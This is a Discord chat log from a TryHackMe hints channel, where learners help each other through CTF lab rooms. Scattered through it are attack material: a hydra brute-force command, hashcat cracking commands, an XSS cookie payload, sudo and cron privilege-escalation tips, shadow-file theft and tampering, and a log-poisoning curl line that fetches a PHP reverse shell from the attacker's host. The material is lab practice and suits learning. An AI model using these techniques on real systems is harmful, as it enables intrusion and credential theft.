#room-hints
ok understood.
i will give it a try. Thank you ❤️
Gave +1 Rep to @lucid junco (current: #2 - 2044)
Hey0 good morning - working on this room https://tryhackme.com/room/ultratech1 - anyone have a hint on task 3? I think we gotta use the /ping portion of the API to discover something? Idk....the question in task 3 makes it sound like discovering the DB isn't too difficult, ran basic sqlmap and nothing, enumerated what I could and I'm super stuck. I don't know very much about APIs D:
Have you tried inserting commands in the IP address field ?
I need a hint for Pickle Rick room, I'm in despair
I've found ||username: R1ckRul3s|| and ||/login.php||
I've tried ||bruteforcing with the username and 10k passwords/digit combinations, fuzzed for SQLi, tried playing around with form values and headers|| but got nothing
Maybe doing dir enum might help you
I've found ||clue.txt|| but I guess it should be found after getting shell as www-data lol
I think I've run out of dictionaries for dir enum
several directory dictionaries, all 1-4 letter combinations, all 3-5 digit combinations, even names dictionary
Hello, who can help me with this problem?
looks like a technical problem, better ask on #site-support
oh wait, it's just incorrect answer, I thought it's some bad request popup lol
The password can be found.
Enumeration is key
oh lord, I've found ||robots.txt|| looong time ago, but never thought about ||using it as a password||, had to get a hint from a writeup, lol
halp halp halp, I'm doing https://tryhackme.com/room/stuxctf - the only hint is diffie hellman and a page inspection that gives me digits. I'm no mathematician - I've tried looking up diffie hellman calculators and I'm just not sure what I'm doing. Anyone care to point me to a good resource or explain how to do this math problem?
oh man, I got my colleague who's a physics major in on this and he cant figure it out either >.<
i wonder what c is
need a hint for root flag in https://tryhackme.com/room/yearoftherabbit - do I need to analyze the core dump to find out something?
i guess not. I've found that ||user gwendoline can sudo (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt|| but im not sure what to do with it
so, i'm doing mrrobot right now executing || hydra -l Elliot -P fsocity.dic 10.10.17.3 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the" -t 30 || been waiting for 30 minutes now. anything i can do to speed up the ||bruteforce||?
do you know what is vi?
sure
i know it can be exploited if ran with root privileges, but seems like I can't do it there
what did you try to do?
since I cannot run vi as root, I don't really know what to try
i can start shell as another user, but not root
as written when you do "sudo -l" you must not only run vi as root but read the file with it too, so do "/usr/bin/vi /home/gwendoline/user.txt"
I know, but what does it change?
you can then open it and increase your privileges, because you do not have the right to use vi basically you just have the right to use vi to open user.txt
but how can I increase my privileges if I still cannot open it as root?
I can open it as anyone but root
you can open it as root
you have to find a way to do it
check the sudo version and search on google a way to do it ;)
Ahhhhh....i'm waiting and waiting but the mrrobot ||hydra brute force|| just won't complete
quick question to https://tryhackme.com/room/lianyu room - ||the video at /island/2100/ is no longer available - does it affect the challenge?||
because I've found ||green_arrow.ticket and the token RTy8yhBQdscX looks just like an identifier on youtube, but youtube.com/watch?v=RTy8yhBQdscX also says video no longer available)||
Maybe it is an encoded string and not an identifier
tried it, decoding it as base64 doesnt give anything readable
Hint will be, it is not base64 encoded. Try others, i usually used the tool cyberchef, served me well
thanks! got it, definitely bookmarking cyberchef
finished the room, super fun one!
What do you need heko with?
heko โค๏ธ
Hi, I'm stuck at the Jenkins room; once i've had my rev shell, the second one is not working. The ps commands in the Jenkins application dont compile/work anymore. It only works once.
To clarify, is the room name Alfred (as there may be other rooms using Jenkins as the target application) ?
Yes roomname Alfred. https://tryhackme.com/room/alfred
By 'second one is not working', are you pertaining to the shell session not working properly?
The first time I use the Jenkins application to execute a rev shell it works; whenever I do this again (after termination of the connection, or because I want to upload a better shell) the build does not complete anymore and it gives an error on the system commands that I've changed.
Aaahh... what payload are you using for the initial reverse shell?
do u need help
What wordlist are you using?
I need help with advent of cyber 2022 questions please
You can ask. Someone will answer you
Thank you
I've finished it by now. Just forgot to ||reduce the size of the wordlist you find in that room||
Hey guys, Just going over some old rooms and cant get a meterpreter shell on ToolsRus, keep getting failed aborted due to failure : unable to automatically select target.
ignore me, sorted now
Expose challenge
I started with nmap, 3 open ports. Now I'm using hydra to find the username and pass, am I on the right path?
Try to look for an SQL injection
You made it so clear 😭😭
@stuck fractal when i google it it find me your room in google
i mean the interface name is wlan0 right?
it doesnt change
i know the answer is wlan0mon i dont understand why
Did you enable monitor mode with airmon or with iw?
@stuck fractal Hi
In Room Snapped Phish-ing Line id task 7 has answer? According to question "When was the SSL certificate the phishing domain used to host the phishing kit archive first logged? (format: YYYY-MM-DD)" I check it in whois website https://www.whois.com/whois/kennaroads.buzz but still wrong
I haven't done that room, why are you pinging me for this?
Sorry my problem
Network Services 2 > Exploiting NFS > bash file
I have correctly followed all the steps, but the problem is when I execute the bash file, nothing happens. Has anyone encountered the same issue?
who owns the file?
The second step says that the copied bash file must be owned by root user, and a command is provided in which I followed.
can someone give me a hint for the ctf pickle rick
I didn't get the first ingredient
You're in a bit of a pickle I see.
kinda yeah
I found the username inspecting the website
I try using hydra but ssh is not using password
then I found assets directory
The password can be enumerated.
You may actually have already found it and not even paid attention.
and I'm trying to path traversal to /home/user/.ssh/id_rsa but I can't
what do you mean enumerated
Have you found a common webpage that's in almost every ctf you've done?
I tried index.php but I didn't do that many ctf to know the common place to look for
I could use a hint
Beep Boop
ssh-hostkey ?
ok ok
what's that
A clue.
I might be too young to understand those reference sorry
B99 isn't that old ๐ญ @trim haven
Run a dirbuster on the ip.
I did
What did you get?
Gosh, how old are you!? 🤣
Same ^^
It's a Comedy TV Series
I'm not a comedy fan
friends and other stuff doesn't appeal me
I'm more a doctor who fan
anyway for the dirbuster should I do it again and let it finish the wordlists
and can I do 2>/dev/null to get rid of the errors ?
There is a web page that is common in ctf to have some information.
what am I supposed to do with that
What does it look like?
Have you enumerated another login web page?
If your wordlist isn't working, try a bigger one.
alright
those
or should I look online for even bigger ones ?
I'm already using medium which is the biggest one I seem to have
Don't you have seclists?
I do yeah
let me look for a big one
thanks
there is so many but I'm trying with this one we'll see
directory-list-2.3-big.txt
Gooood idea.
I'm using the option -t250 but idk how much can I put
is it the max ?
or can I push it even more so it's faster
Don't worry about speed.
It is
can you help me
I still have nothing popping up
I tried going for /admin or /login but nothing
-x 'php'
alright
thanks
broooo
I looked for portal I swear
no way I needed .php
so when I'm doing gobuster without the option -x it won't show me directory with .* only the ones with words
with -x it will just search for the list with .php
but if I didn't use -x and keep and searching with the list for ever will it found portal.php or no
if you used -x 'php, html, txt'
It will only look for those things.
ok ok
It would have.
cause I was running it for 20 mins nothing found
and just by putting .php it took 2 sec
so I was curious
maybe by default it doesn't look for file and only plain words
@lucid junco
I might have cheat idk
I did the room privilege escalation on linux so I'm familiar with certain stuff and the one I remembered very well is using base64 to see files
That's not cheating.
so I couldn't do cat /home/rick/'second ingredients' so I used base64 to see it
yeah but maybe that's not how I was supposed to do it yk
Yeah, but on the other hand, you've taken something you've learned, and used it to gain something else.
yeah but it was luck
I didn't check if I had permission to use base64
I just tried and got lucky
Do you have a shell, or are you still using the webpage?
still on portal.php
I was thinking looking in passwd and shadow to get rick password
but yeah that's the thing I feel like I skipped steps
like I saw there is a cookie named phpsession but couldn't decode it
so I didn't look more in it
I got a shell
but I'm still in the same situation lmao
do I have to look more into the phpsession cookie ?
not really.
thanks
can I get a hint on where to look for the last one
I was thinking getting root
It's going to be in root, so I'd look for a way to PrivEsc, or find out what your current shell can run.
There's a command that does that.
lmao nice
I'm not completely lost that's good
let's gooooo
why does it look like that tho ?
invisible shell
should I do import python
If you want, not essential for this CTF though
yeah I got the 3rd
it feels so good I didn't have to look online for help
you're the best thanks a lot @lucid junco
Gave +1 Rep to @lucid junco (current: #1 - 2121)
no problem, happy hacking!
what's the difference between those two rooms :
https://tryhackme.com/r/room/linuxprivesc
https://tryhackme.com/r/room/linprivesc
by looking at the task I feel like they both are doing the same stuff
One is created by THM, one is created by a community member.
https://tryhackme.com/r/room/crackthehash
Task 1, question 4:
I can't find the $2y$ hash on hashcat's website mentioned in the hint. All I could find are 4 hashes that start with $2a$ and one hash starting with $2b$. Am I missing something?
Right now, I'm brute-forcing hash 28400 - (bcrypt(sha512($pass)) / bcryptsha512) with a lowercase four-letter mask, but it really takes a long time. 63% done, and still nothing. My guess is it's not the right hash. Should I just brute-force the hash types I mentioned as well? :/
What's your command?
hashcat -m 28400 -a 3 hash "?l?l?l?l" where hash is the file containing the hash
take a close(r) look at the hash-names in the hashcat examples
You're using the wrong number, also why not use a wordlist?
Found it with a filtered wordlist, thank you both
Gave 1 Rep to .scrubz. (current: #1 - 2123)
You're still on cooldown
You're still on cooldown
Hi, I'm currently doing the Wonderland box as the Alice user, and I have enumerated enough without finding a proper way to make horizontal privs escalation. Actually I got 2 options, but I don't know if they're just rabbit holes or a real way of granting me another access:
- I can run a python script as another user, via sudo but I don't know how am I supposed to hijack this, I can't really tamper the script or the script path, it's hardcoded in the sudoers file
- I can exploit a capability but the gtfobins command doesn't work (permission denied) or I just get Alice shell again
Any hints ? Am I right by trying these two options ?
Did you use sudo -l ?
Yep, and I got the thing about the python script, it could be run as "rabbit" user
Have you thought about running it?
the script itself doesn't do anything crazy, just printing 10 random lines
yes
I read the code
The same 10 random lines?
not really, it changes at each new running time
Maybe now you should try and find out what the script is doing
I think I already know, it just uses the "random" function to print 10 lines thanks to a for loop but..why ?
Because it's using the library random
yes, but I don't have any write permission to modify it, the variable used is set in it, I can't add a command line to be printed or interpreted by python at the same way I guess
Well, you know the script is looking for something "random"
Does the random library have a path, or is it just looking for anything that is random?
I see what you mean ! Thanks I know what I have to do
Gave +1 Rep to @lucid junco (current: #1 - 2124)
Crack the hash again, task 2:
I tried modes 150 and 160 (both HMAC-SHA1 like the hint says, but each time the key is different - password or salt) with 12-character words from rockyou.txt, and got nothing.
hashcat -m 160 -a 3 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme words.txt
What did I miss this time?..
According to a write-up, the correct hash isn't either one of the HMAC-SHA1 hash modes I tried despite the hint saying exactly that
Hello everyone, I am doing the Agentsudo ctf and I am stuck in the step where I am supposed to find the other agent's name, that starts with J, I accidentally spoiled myself and I know the name is j***s, but I have no idea how I could find it
link to the room : https://tryhackme.com/r/room/agentsudoctf
SOLVED, steghide..
can someone give me a hint at the last question on the task 6 of this room https://tryhackme.com/r/room/windowsfundamentals1xbx?
Click on properties of the user, it's an option.
should open another window right?
A pop up yeah
this?
Yeah, it's one of those
i dont see anything about status
Account is ....
oh nevermind, the hint was correct after all, but the write-up linked from the room itself says the mode is 110, but it's in fact 160 as I just finally confirmed (I used -a 3 instead of -a 0 for a dictionary attack, so that's why it was super slow...)
Hi!
vulnnetinternal
I need a little hint on how to find out the username in order to use the passwords we have already found.
I'm stuck at the stage of getting access to the machine itself:
What is the user flag? (user.txt)
||Is the username being searched in the database or is it being Brute-force?||
You will find the username upon accessing the || rsync || service.
I don't recall having any need for brute forcing.
Yeah, that's what I'm doing.
I guess I didn't get everything out of it.
I found a shared folder, but the password I found is not suitable to see what's inside.
I will look for other passwords, now I have only two of them in my hands.
If you already have the internal flag, its just a matter of further exploring the said service.
Hi, I am a little stuck. In room Relevant I have access to a samba share with read/write access. I can access the samba share files via http. My idea is to upload a reverse shell, but I don't know what format to use. Any idea?
web framework asp .net and google is the solution
Another question, If you use brute force with rockyou.txt, how long do you keep the task running before you decide it is pointless? For CTF, not for real world pentest of course.
Depends on the ctf. The benchmark for thm is under 5 minutes
Under 5 minutes with the Attackbox*
Right that's a fair distinction
Hard for us to verify this for each users setup
Aye
Attackbox is so slow though
I've rarely had issues with it tbh
I mean for cracking hashes
Hi!
Advent of Cyber 2022
Task 23[Day 18] Sigma Lumberjack Lenny Learns New Rules
I can't figure out what kind of mistake is this?
It might be due to a missing space for the modified field
Thanks, @left thunder I rebooted the machine.
It helped. 🤦‍♂️
Gave +1 Rep to @left thunder (current: #3 - 1815)
Not asking for help, but wanted to share something I encountered today. I'm going through the Linux PrivEsc room, and Task 9 involves crontabs. The challenge suggests popping a reverse shell by exploiting the way the cron job is set up. Going to spoiler this just in case: ||There's a cron job called backup.sh which is stored in karen's home directory, we have write access to it. It runs every minute. All we need to do is replace the contents of that script with the line for our reverse shell, then open up a listener on the attacking machine, and once the cron job spins up, boom, reverse shell. I did this, but nothing happened... I started looking into everything, and what I found eventually was that the shell script did not even have execute permissions. Even though there was a cron job set up, it was never running because the script can't fire anyway. I was able to chmod to add x perms, and then boom, reverse shell.||
sounds about right.
@ripe hedge thank you
Gave +1 Rep to @ripe hedge (current: #11 - 565)
Hello!
Can somebody point me to the right direction with MrRobot CTF? Please DM me if you can.
I don't want to use walkthrough.
Nvm, I found it, It was just a typo, lol
For Pickle Rick, is the apparently encrypted folders inside the var/log/journal directory used for anything?
No.
Bonus points if you get in them though
Crap, I think i broke the machine, I grep'd for ||ingredient|| over my reverse shell and now the terminal is not responding to my commands. Is there a way to cancel the grep? Or should I just wait for it to complete. I can't seem to access the login to attempt to re-establish the reverse shell
nvm
can I have a hint on privesc on pickle rick?
I know the kernel version etc. but I can't seem to find anything useful on exploitDB
Do you have a shell?
Reverse shell under www-data
I tried to steal the .ssh key but it's access denied. I checked crontabs to see if there were any scripts, apache to read the shadow file and see if there was a hash
Is there a way to see what www-data can run as sudo?
although I was able to use sudo cat
Do you know why?
is it because I can run all commands?
(ALL) NOPASSWD: ALL
🤦
I tried sudo in the past, like sudo -s, it would say something like "unable to sudo"
In Picklerick?
Ah, yeah, you're changing to root, so it would ask for authentication.
spoiler territory but ||sudo su root|| worked with no password
Not spoiler, that's working as intended.
Thanks to www-data ||being able to run all sudo commands without a password||
thanks for the hint!
On the subject of that|| sudo -l screen||, I thought|| "you can run all, no passwd"|| meant "you can run all commands that don't require a password" i.e. guest level access, esp since|| sudo -s ||(the classic "give me root" command) was giving me an error so I thought I wasn't in sudoers or something. (Don't tell Santa!)
am i missing something or doing something wrong? dreaming room
Look carefully at the "(death)" part
thanks, took me a bit to google the syntax and how to use it, but that did it
+rep @ivory meadow
Gave +1 Rep to @ivory meadow (current: #26 - 298)
Hi, I'm doing the TryHack3M: Bricks Heist room and believe I've found the wallet inside ||/lib/NetworkManager/inet.conf|| and after ||decoding|| it via ||hex and 2x base64|| I get a ||bc1|| wallet, but that doesn't seem to exist. Anyone who might be able to push me towards the right track?
Edit: Found an unethical solution but it did the trick: ||Abusing tryhackme's "answer format", I figured out that its length is 42 and used that - it worked! Time to get a bit more familiar with blockchain/crypto wallets I guess||
Can you give me a hint on the room
No hints on this room until Thursday 7pm UK time
Room : Bypass
Hi, I tried getting the second flag by changing the || user-agent|| but I still get the "invalid attempt" message :
||I did it with curl (-A option & -H option) = KO
I did it with Burpsuite = KO
I did it with Python = KO
I rebooted the VM = KO
I tried different version of the User-Agent (with quotes, without them) = KO||
Any hint ? ||my GET request seems ok though||
I give it a try here in addition to the dedicated channel
This has a dedicated channel, which will probably give you a better response #1225867883066691674
Oh my bad you already posted there
curl -k --user-agent "I am Steve Friend" 'http://cctv.thm/fpassword.php?id=2'
You need to make a request on port 80, specifying the user agent as "I am Steve Friend".
I will try this, but the target seems to be on port 443, according to the note
That's what I actually did through several ways, none worked at the time
It worked thank you, it doesn't make sense to me to switch from 443 to 80 between the first and second task but ok
Gave +1 Rep to @sullen kelp (current: #2059 - 1)
Still trying to figure out how to find the threat actor group that owns the wallet, any advice?
Feel free to send me a dm, not sure if it's allowed yet due to Blackouts post
Please do not ask for hints in the discord server for challenge rooms that were released within the last 72 hours cc @snow zinc
My bad, didn't know about the 72hrs
It is posted in the relevant module channel #tryhack3m-special-module
Thx, missed it
Did you manage to get more info on the wallet addresses ? I'm on the last question and have been exploring blockchain and the mitre attack site and am a bit stuck there
.
Hello Everybody , good afternoon!
I need some help with this room Network services. Enumerating Telnet. I've been stuck now for 3 days. I have tried Nmap and found port 8012. I found something about skiddy but can't find it again. I tried with enum4linux and smbclient but they won't work. Any help? Thank you!
+rep @pulsar crane
Gave +1 Rep to @pulsar crane (current: #831 - 4)
Nmap

man you just need to connect via telnet with port 8012
Thanks for the hint. let me give that a try.
that worked. 
glad to help you
Gave 1 Rep to aurumdev (current: #707 - 5)
task 8 what point?
anyway if you read the task it says that the login page is :"http://MACHINE_IP/login-get/index.php"
Thanks Dansu, I totally missed that.
Gave +1 Rep to @stone orchid (current: #1367 - 2)
Greetings! I decided to start poking around some of the CTFs, and I settled on Expose as a first one. It presents a really interesting but somewhat simple challenge. From the get go, we're just given an IP address, and the name of two files to grab (a user flag and a root flag). From what I've gathered, this is a pretty usual starting point for CTFs.
I started doing some enumeration on the system, and found the following: Via an nmap -sS IP_ADDRESS scan, I was able to identify three open ports: 21 (ftp), 22 (ssh), and 53 (dns / domain). I was able to grab the versions of each of the services running on them as well. However, I hit a wall I didn't really think about. I don't even know where to start with trying to brute force a login if I have no password. I found a usernames wordlist, and am currently running a Hydra scan on the ssh to see if I can find anything, but if I were to let this scan continue to run, it would take a very long time.
So what I'm looking for is some hint as to how I can work on enumerating the users on a given host. Is there something I can flood with attempts from the wordlist that would respond with something akin to "no such user" if the username doesn't exist, and "wrong password" for a correct username? If I use hydra and just give it a single password wordlist, my understanding is that it'll just return no matches. (I tried this, and that's what happened)
Am I forgetting something really basic about how to identify users on a system without actually having access to that system?
Certainly if I had access to the system I could probably find other users, but without any access I'm feeling a bit stumped. Wanted to reach out here rather than just looking up the answer, and in the meantime I'm continuing to search / research
Do you think there are only 3 ports open on the machine, or are there more?
I haven't probed deeper, but I absolutely can
I just checked -sS to start with. I suspected that might be too limited, but once those ports showed up I felt like "okay, here's something to work with", until it occurred to me that I might not have enough to work with.
You should probe deeper.
thanks @pulsar crane
Gave +1 Rep to @pulsar crane (current: #619 - 6)
will do, thank you
Gave +1 Rep to @lucid junco (current: #1 - 2173)
i was working on the Windows User Account Forensics and have gotten stumped on the following question: What is the value of the "bootKey" variable? I must be overlooking it because i got the previous and next questions correct... What does the value look like? or how is it presented in the output? or is there another command I forgot to complete?
Just an update, because it's been sort of slow progress: ||I ran a scan on all ports, and found two additional ones! 1337 which is a web server, but seems to have basically nothing on it, and 1883 which is a mqtt mosquitto server. Been digging into the mosquitto route so far: can I find a way to subscribe to it to retrieve whatever messages are being sent from it? Yes I can! But I don't understand what good these messages could do me yet. My thought here is maybe I can find a way to publish a message to it and get it to send a message to something that will report back something useful like credentials or whatnot||
I am in the uploadvulns room, I make a revshell from revshells.com and upload it to the server while I am listening
But nothing comes back
Any ideas?
Nothing appears to be in the resources directory, where it is supposed to be
Whatever I upload, nothing goes there
In which task are you on?
5
How do I execute a .sh file through the URL once it is uploaded
?
When I navigate to it through the URL, it just downloads
How do I execute payload(1)?
In the task for a php webshell it says just to visit it
This is a reverse shell
How do I activate it
?
Running a .sh payload will depend how the web application is processing it (e.g., if it passes it to the OS). Have you tried a php (from pentestmonkey) one?
That is the default answer
The default solution
However it is said, use either a webshell or a rev shell
I decided to use a revshell
Should I use a PHP reverse shell then?
Well, I got in
But I did not get in with a rev shell with a .sh extension
Got in with a pentestmonkey php revshell
Thank you anyways for the help!
Gave +1 Rep to @tropic garden (current: #13 - 514)
Should you choose to run a webshell, there is one somewhere in kali. Can't remember exactly if it's in /usr/share/webshells but there should be one. You can then put in a reverse shell payload using that webshell, but that will take another step and it might not work in all cases depending on the web application you are dealing with.
I'll bear that in mind
Any help to get TCP flag from borderlands room?
hlo
hi
How do I stop and start a service from the meterpreter command line? (Steel mountain)
nevermind, I was able to use shell to switch to what I assume is a cmd shell
Hi.
I'm at the last step - room - "vulnnetinternal"
||I can't figure out how to get RCE when I've already got to the admin panel - TeamCity.||
Suggest that you do a Google search for an exploit for it.
Yes, they are, but they do what I have already received. I need to find out how to upload a shell there or get an RCE.
||exploits allow you to log in without authentication, but they don't give you a shell, and I don't understand how to upload a file for a reverse shell.||
||I even found a metasploit, but it doesn't work properly.
that's why I decided to ask how you managed to exploit the admin panel.||
||Have you loaded the payload through plugins?
Or did some script do all the work for you?||
One of the Google results when you do a search on || TeamCity exploit || will give you a vulnerability you can exploit to get RCE on the target.
Did this exploit work for you without any problems?
You didn't have any mistakes, such as:
[-] Failed to parse token XML response [-] Error in func <GetToken>, error message: syntax error: line 1, column
|| You can also try doing a search on TeamCity Pentesting ||.
Hi all. Newbie to TryHackMe. Seriously stuck on walkinganapllication Task 3 Question 3. I have no clue how to find this 'directory' in order to get this flag.txt file. I've exhausted the discord for others looking for help but I'm no further forward. Any help would be very appreciated ❤️
Do you know what forced directory browsers are?
Hi @lucid junco I do not, no.
OK, there are tools like Dirbuster and gobuster.
Research them
Thanks. I'll look into them now!
Gave +1 Rep to @lucid junco (current: #1 - 2197)
@lucid junco I'll need a bit of hand holding here. I now have a brief understanding of FDB after researching. I don't know how I apply this to this question though... I have tried altering the URL manually within my browser with no luck. My last remaining braincell is slowly burning up. Wondering if I need to use another room prior to this one? I came from intro to cyber security straight to Jr pen tester.
hello everyone, are the free rooms, level easy, without privilege escalation?
Easy rooms may still require you to do privilege escalation, but it is something you'll need to encounter sooner or later as part of the learning process. In my case, there are a couple of rooms I'm stuck at the privesc stage.
Don't forget to have fun while learning though.
Alright, I'm just not in the privilege escalation module yet
I'm doing the XSS room and at Task 7 the task is the following:
Go to the contact page and submit the following message <script>alert(document.cookie)</script>. Next, log in as the Receptionist. What is the name of the key from the displayed key-value pair?
I've logged in as the Receptionist but I don't understand what the second part is: "What is the name of the key from the displayed key-value pair?"
Have you not gotten a pop-up when logging in?
Found it, thanks @left thunder
Gave +1 Rep to @left thunder (current: #3 - 1820)
I was looking in the wrong section of some tool
What this question means?
Network services room
SMB enumeration task
last question
You need to enumerate the smb port and see which shares are on there that look suspicious
How to find suspicious shares?
Sharename Type Comment
--------- ---- -------
netlogon Disk Network Logon Service
profiles Disk Users profiles
print$ Disk Printer Drivers
IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP POLOSMB
[+] Attempting to map shares on 10.10.31.165
Out of the ones listed. What do you think good to investigate?
@devout moss online ???
on line
Hi!
Avengers Blog Task 6 - SQL Injection
I am confused by the question, the answer is obvious, you need to open the source code of the page and just specify the number of lines.
But it didn't fit.
I did not count the empty lines and counted only the filled ones, but also not correctly.
Probably a stupid question, but How do I count the lines correctly?)
I have a feeling that the source code displayed is not the right one after I managed to log in to "JarvisControlPanel".
Can anyone else check this room?
https://tryhackme.com/r/room/avengers
I am the only one who sees such page source code in question 6.
hi, i'm looking for a hint with privilege escalation to root in cat picture 2 room (https://tryhackme.com/r/room/catpictures2)
reverse shell
can i dm ?
hey,
anyone here completed Midnight Linux? Actually I am having trouble logging in as the 4th user and the root user. I have the passwords of both of them but when I ssh it shows me permission denied for these users
Link the room?
This room is private, we can't help, sorry
but i have a free account and i can access this room how's that possible
Are you part of a school/business?
^
Having a free account doesn't mean you can't access a private room. Private room != Premium room
hello, on the room : https://tryhackme.com/r/room/archangel
I don't really get why it doesn't work. The only intel I got is that it works for my friend, but he's using a VPN.
So, I'm at the "Get a shell" part, and here is what I'm doing for LFI to RCE via file poisoning, if I'm not wrong.
curl : || curl "http://10.10.184.130/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.10.154.10:8080/rev.php')) ?>" ||
I also got a Python server running: python -m http.server 8080 and a netcat: nc -nvlp 9001
The problem is I don't manage to get my revshell on the target server, if I'm not mistaken.
Are you using the same payload as your friend? If I remember correctly, I used || /var/log/access.log to gain RCE via LFI as well ||.
Yes, I tried with the one I showed AND another method which is exactly the one you said, with Burp, and both don't work for me but work for my friends. I don't get it, lol, it's frustrating.
It's OK, I finally got it with the same method as you.
Intro-to-Logs: Task5 Practical Activity: Log Management with logrotate.
I've created the nano file given "/var/log/websrv-02/rsyslog_sshd.log"
and executed the given command "sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf"
only to receive "error: stat of /var/log/websrv-02/rsyslog_sshd.log failed: No such file or directory"
Could use some help in finding out what I'm doing wrong.
It's really tricky to make it work, especially if it's your first time doing it.
https://tryhackme.com/r/room/lessonlearned
I tried every possible sql injection manually as well as using scripts, but I was not able to find any sqli, even read some writeups after getting frustrated and saw that they used the same payload which I was using and got the flag.
Is the room broken or am I missing something? Please guide me, anyone who has solved the room.
Nobody can tell you where you went wrong without knowing exactly what you did. Exactly as in code, screenshots.
In https://tryhackme.com/r/room/profilesroom .. Will Volatility 3 work for the base questions?
This could be answered already in #1238551397784354877
Were you able to sort this out? I just completed the room and this seems to be the source code for the home before you logged in.
Just did Atlas (https://tryhackme.com/r/room/atlas) and was wondering what enumeration should I have done to discover that the target is vulnerable to || PrintNightmare ||? I know it wasn't part of the task, but I tried WinPEAS and PrivescCheck (and even did manual enumeration), but didn't get any fruitful result.
I guess the curiosity here stems from how I can further improve my Windows enumeration skills / methodology.
Hi, nah, I specifically went out and rebooted the box. That's why I asked someone else to check it out. The browser stubbornly shows me that the source code is not what I need.
The source code that showed the <Hint> is on the home page though before logging in.
I have to check the source code of this page, right?
yes
I'm just looking at the code of this very page. That's why it's weird.
Everything is fine, I used another virtual machine and the code displayed is the one I need!
What was the reason for this on the last VM, I still did not understand!
@tropic garden Thanks for checking it out. At first I thought it was a bug on the box)
I'm not certain as I only encountered the home page (before logging in) and the Jarvis page (after logging in).
Room is wgelctf, so wget has sudo without a password. I've exfiltrated the shadow file and tampered with the salted password of the user, replacing it with a new one generated using mkpasswd -m sha-512, and then I pulled the tampered shadow back. But then I can't ssh back for some reason?
Nvm, wget will probably append some GET headers... let me check.
Nope, not the case
Can someone please push me with the last question in the room - "TryHack3M: Bricks Heist"
Maybe I misunderstand him.
Is the answer inside the box or on external resources?
"threat group", perhaps its APTs?
external resources
Yes, I also had the idea of (APT) in the first place in my head...
I only have doubts, can these groups really be calculated by the wallet number???
I think you are supposed to create a new user (e.g., newroot) and assign it a user id and group id of "0".
Haven't reached that point yet, but I suppose you could tell the APT group as they usually have a wallet ID as part of the ransom note, for instance?
I think that everything is anonymous and if it were so easy to figure it out, then the black market and the "dark-web" would not exist.
You type in the wallet address and it gives you who its owner is?
uh?!
If said group announces themselves as the creator of said ransomware, for example, then they are linked.
Copy the line / record for root in /etc/shadow, replace the user name (root) with a new one (new root), replace the hashed password to one that you generated (as root user and group id is already set to 0).
how's that different from changing the password of the existing user?
It worked when I did it.
At the end of the day, it's still up to you what method you use.
I would need to tamper the passwd file too with the new user, uh?
using your method
Yes. I won't get a chance to take a look at my notes until later.
I found transactions on the Internet, but there are only wallet numbers, who transferred to whom is not said, and there is also no information about the group.
Is it definitely possible to find it through external sources?
To clarify, you used this resource to search -"||blockchair.com - blockchain.com||" or some other one?
I haven't done that room yet my man
Ohhhhh, I got it, OK, I thought you passed it
Anyone completed Osiris? The issue I have is my compiled service is not working.
I'll have to debug it on Windoze
Which service?
My idea was to create a Windows service to start nc as SYSTEM, as I can copy files to the box.
Where did you get the service from?
I created the Windows service to impersonate one on the server.
https://github.com/mattymcfatty/unquotedPoC
Try this one.
as I can start and stop services
yes, similar to that service
It's just a .NET Windows Service in C#.
I'll have to fully debug it locally
I'm clearly on the right track...
My code and that code work if I do something simple like creating a user ID, but spawning nc64.exe - not happy.
I need to debug locally; it does not execute nc64.exe!
Hey, and which of you was able to answer the last question in the room - "TryHack3M: Bricks Heist"?
Internet research on this issue has not yielded results.
I was solving TryHack3M: Bricks Heist and noticed the xmlrpc.php file. I am trying an XXE attack, but my payloads don't have any effect. Am I on the right path or going down a rabbit hole?
okayy!!
Yes.. initially my idea was to use wpscan as I saw wp-* files, but when I used it, it gave the error (SSL peer certificate or SSH remote key was not OK), so I thought I might be doing something wrong.. then I saw the xml file in the page source..
Now searching if there is any solution for this error..
You are in the right direction in terms of using wpscan, but you might need to play around with the switches / flags a bit to get the info you need.
Thanks... But i solved it..
I was missing a flag while using wpscan once I used it. It was easy...
Gave +1 Rep to @tropic garden (current: #13 - 561)
Doing the Gotta Catch'em All! CTF room. I'm struggling to find the Water-Type Pokemon. Any hints?
You should be able to locate it.
In that ||array|| I found that pokemon. But I don't know how that flag should be defined, e.g. ***{FLAG}. Idk how to find what the starred value will be.
It's encrypted ;)
Hm.. I don't see anything in the ||page-source||. Should I do anything in the ||console|| to retrieve that? Or anything to do with the ||array||?
I thought you found the water type flag?
I just guessed it by googling and matching that with the ||array.|| like the previous flag. lol, this is not the way it is?
locage water-type
Huh. I don't understand (: You mean locate?
Yes
Let me guess.. the water type must be ||squirtle|| as it was mentioned in that ||array.|| That's how I came up with it.
Yeah.
But where to look to find what comes before it? ||console||?
Terminal
||web dir brute?|| I thought I did enough.
Ssh
It was in the ||page-source||. I didn't think that far. Thanks for helping!
Gave +1 Rep to @lucid junco (current: #1 - 2304)
Now I'm doing the Madness CTF room. Oh boi, I'm not able to fix this ||png|| file. Tried giving the correct ||IHDR chunk value|| but that doesn't seem to work.
Tried this room a couple of times, but having a hard time with JS. Will probably do a couple of Intro to JS rooms and get back on this one.
That is a fun one. Have you tried running || file || on that one?
there's no need of JS knowledge in this room!
Yh, also did ||pngcheck||. It's something about the ||chunk value|| that I'm not following. Edit: nvm, understood where I'm going wrong.. such a stupid I am.
Is that so? I'll take a look again when I get the chance.
Did you get the water type?
locate water-type.txt
Asking me? Yes! Also I made it to the end.
So, just Madness?
Yup.. but it seems I'm progressing. I'll ping if there's anything.
https://tryhackme.com/r/room/owasptop102021
task 11
The hint says "Is there any security question that can be easily guessed?", which obviously means "What's your favourite colour?", right? I ran a sniper attack with Burp's Intruder and a wordlist of ~200 lowercase colors, and got nothing. What am I missing?
It is the colors and it's not an obscure one. You must be doing something wrong with Burp or interpreting the results wrong.
I manually went through the responses, Location header was always the same, leading to the same page, so I'd say that should be accurate.
I now tried with wfuzz too, no luck.
I used this color wordlist's first column:
https://github.com/codebrainz/color-names/blob/master/output/colors.csv
Take the ten most obvious colors you can think of and try it manually, no tools
I can't spontaneously tell you why it didn't work with Burp and wfuzz.
